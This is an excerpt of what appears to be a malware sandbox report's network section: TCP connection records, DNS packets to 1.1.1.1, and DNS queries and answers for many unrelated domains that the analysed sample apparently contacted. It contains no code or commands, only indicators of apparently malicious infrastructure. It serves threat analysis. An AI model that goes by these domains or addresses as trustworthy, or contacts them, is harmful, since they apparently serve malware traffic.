                                                                                              Oct 8, 2024 15:54:10.958142042 CEST4999780192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:11.977505922 CEST4999880192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:11.982430935 CEST8049998172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:11.982498884 CEST4999880192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:11.991736889 CEST4999880192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:11.996707916 CEST8049998172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:12.891012907 CEST8049998172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:12.891283989 CEST8049998172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:12.891515970 CEST4999880192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:12.894294977 CEST4999880192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:12.899236917 CEST8049998172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:17.962508917 CEST4999980192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:17.967993021 CEST8049999217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:17.968095064 CEST4999980192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:17.985896111 CEST4999980192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:17.991189003 CEST8049999217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:18.611948013 CEST8049999217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:18.612164021 CEST8049999217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:18.612380981 CEST4999980192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:19.489113092 CEST4999980192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:20.508696079 CEST5000180192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:20.513592958 CEST8050001217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:20.513701916 CEST5000180192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:20.526577950 CEST5000180192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:20.531809092 CEST8050001217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:21.135868073 CEST8050001217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:21.135890007 CEST8050001217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:21.136112928 CEST5000180192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:22.035897970 CEST5000180192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:23.066459894 CEST5000280192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:23.071516037 CEST8050002217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:23.071875095 CEST5000280192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:23.084533930 CEST5000280192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:23.089708090 CEST8050002217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:23.090322971 CEST8050002217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:23.693427086 CEST8050002217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:23.693526983 CEST8050002217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:23.693624973 CEST5000280192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:24.598372936 CEST5000280192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:25.617412090 CEST5000380192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:25.622268915 CEST8050003217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:25.622351885 CEST5000380192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:25.630117893 CEST5000380192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:25.634916067 CEST8050003217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:26.224725008 CEST8050003217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:26.224885941 CEST8050003217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:26.224935055 CEST8050003217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:26.225018978 CEST5000380192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:26.225059032 CEST5000380192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:26.250638962 CEST5000380192.168.2.6217.70.184.50
                                                                                              Oct 8, 2024 15:54:26.255500078 CEST8050003217.70.184.50192.168.2.6
                                                                                              Oct 8, 2024 15:54:31.448542118 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:31.453712940 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:31.456693888 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:31.468534946 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:31.474179983 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:32.058708906 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:32.059571028 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:32.059633970 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:32.973613977 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:33.993144989 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:33.998802900 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:33.998894930 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:34.010711908 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:34.015656948 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:34.593308926 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:34.593488932 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:34.593707085 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:35.520595074 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.540535927 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.545639992 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:36.545748949 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.562881947 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.568073034 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:36.568097115 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:37.140346050 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:37.140842915 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:37.140939951 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:38.067126989 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.086886883 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.091809988 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.091943979 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.099855900 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.105191946 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.777832031 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.788583040 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.788672924 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.789550066 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.794457912 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:44.827635050 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:44.832731009 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:44.833051920 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:44.842623949 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:44.847459078 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:45.463727951 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:45.463876963 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:45.464154005 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:46.348496914 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.371926069 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.377018929 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.377156019 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.388355017 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.393834114 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.997174025 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.997324944 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.997438908 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:48.895265102 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.033982992 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.038995028 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.039067030 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.095005035 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.099909067 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.100231886 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.680727959 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.680838108 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.681530952 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:51.598701954 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.622975111 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.628220081 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:52.628623009 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.654541969 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.659837008 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318254948 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318289995 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318317890 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318567991 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:53.321583033 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:53.327510118 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.355168104 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:58.360057116 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.360130072 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:58.377140045 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:58.382071972 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.829993010 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.830090046 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:59.879638910 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:59.884907961 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:00.900568962 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:00.905746937 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:00.905870914 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:00.920562029 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:00.925528049 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:01.376338005 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:01.380573034 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:02.457118988 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:02.462311029 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:03.460740089 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:03.466362000 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:03.468753099 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:03.480688095 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:03.486077070 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:03.486093998 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:04.111953020 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:04.112030029 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:04.991590977 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:04.996474981 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.009942055 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.015153885 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.015240908 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.025427103 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.030349016 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.484975100 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.485038996 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.485146046 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.488095045 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.493019104 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:25.960912943 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:25.966254950 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:25.966351986 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:25.977612972 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:25.982615948 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:26.846904993 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:26.846920967 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:26.847033978 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:27.492628098 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.509762049 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.514679909 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:28.514784098 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.532839060 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.537698030 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531091928 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531203032 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531220913 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531562090 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:29.918478966 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.918535948 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:30.036427975 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.056647062 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.061619043 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:31.061940908 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.075041056 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.080144882 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:31.080276966 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:32.142285109 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:32.142441034 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:32.142488956 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:32.583283901 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.603436947 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.608813047 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:33.610719919 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.618738890 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.623940945 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:34.513824940 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:34.514311075 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:34.514487028 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:34.517487049 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:34.522387028 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:39.946463108 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:39.951565027 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:39.951663971 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:39.966044903 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:39.970978022 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:40.590358019 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:40.590601921 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:40.590660095 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:42.661047935 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.680011988 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.684907913 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:43.685175896 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.696643114 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.701653957 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:44.298182011 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:44.298419952 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:44.298531055 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:45.207850933 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:46.227595091 CEST5002780192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:46.233283043 CEST8050027103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:46.233383894 CEST5002780192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:46.245667934 CEST5002780192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:46.250643969 CEST8050027103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:46.250679016 CEST8050027103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:46.851593971 CEST8050027103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:46.851720095 CEST8050027103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:46.851792097 CEST5002780192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:47.756692886 CEST5002780192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:48.774337053 CEST5002880192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:48.779453993 CEST8050028103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:48.779587030 CEST5002880192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:48.788316965 CEST5002880192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:48.793210030 CEST8050028103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:49.395872116 CEST8050028103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:49.395889044 CEST8050028103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:49.395904064 CEST8050028103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:49.396085978 CEST5002880192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:49.396085978 CEST5002880192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:49.399367094 CEST5002880192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:49.404750109 CEST8050028103.224.182.242192.168.2.6

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 8, 2024 15:53:09.911891937 CEST6024953192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:53:09.920198917 CEST53602491.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:53:14.930412054 CEST6416953192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:53:14.940895081 CEST53641691.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:53:19.961343050 CEST6109453192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:53:20.436914921 CEST53610941.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:53:36.055149078 CEST6529253192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:53:36.074657917 CEST53652921.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:53:50.180089951 CEST6103153192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:53:50.640687943 CEST53610311.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:54:03.900480986 CEST4921553192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:54:04.274966955 CEST53492151.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:54:17.899621964 CEST6374153192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:54:17.958338976 CEST53637411.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:54:31.258997917 CEST6264853192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:54:31.444658995 CEST53626481.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:54:44.808316946 CEST6496053192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:54:44.822880030 CEST53649601.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.338051081 CEST5236453192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:54:58.351511002 CEST53523641.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:55:11.496583939 CEST5481853192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:55:25.008346081 CEST5737753192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:55:25.958050013 CEST53573771.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:55:39.528625011 CEST5695053192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:55:39.943692923 CEST53569501.1.1.1192.168.2.6
                                                                                              Oct 8, 2024 15:55:54.414731979 CEST5352353192.168.2.61.1.1.1
                                                                                              Oct 8, 2024 15:55:54.771203041 CEST53535231.1.1.1192.168.2.6

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 8, 2024 15:53:09.911891937 CEST192.168.2.61.1.1.10x1446Standard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:14.930412054 CEST192.168.2.61.1.1.10x733bStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:19.961343050 CEST192.168.2.61.1.1.10xfc4fStandard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:36.055149078 CEST192.168.2.61.1.1.10x80a6Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:50.180089951 CEST192.168.2.61.1.1.10x8a53Standard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:03.900480986 CEST192.168.2.61.1.1.10x9c3dStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:17.899621964 CEST192.168.2.61.1.1.10xb283Standard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:31.258997917 CEST192.168.2.61.1.1.10x8254Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:44.808316946 CEST192.168.2.61.1.1.10x51fcStandard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:58.338051081 CEST192.168.2.61.1.1.10xaf3aStandard query (0)www.dyme.techA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:11.496583939 CEST192.168.2.61.1.1.10xff10Standard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:25.008346081 CEST192.168.2.61.1.1.10x5c7cStandard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:39.528625011 CEST192.168.2.61.1.1.10xe706Standard query (0)www.nobartv6.websiteA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:54.414731979 CEST192.168.2.61.1.1.10x4af6Standard query (0)www.sailnway.netA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 8, 2024 15:53:09.920198917 CEST1.1.1.1192.168.2.60x1446Name error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:14.940895081 CEST1.1.1.1192.168.2.60x733bName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:20.436914921 CEST1.1.1.1192.168.2.60xfc4fNo error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:36.074657917 CEST1.1.1.1192.168.2.60x80a6No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:36.074657917 CEST1.1.1.1192.168.2.60x80a6No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:36.074657917 CEST1.1.1.1192.168.2.60x80a6No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:50.640687943 CEST1.1.1.1192.168.2.60x8a53No error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:53:50.640687943 CEST1.1.1.1192.168.2.60x8a53No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:04.274966955 CEST1.1.1.1192.168.2.60x9c3dNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:04.274966955 CEST1.1.1.1192.168.2.60x9c3dNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:17.958338976 CEST1.1.1.1192.168.2.60xb283No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:17.958338976 CEST1.1.1.1192.168.2.60xb283No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
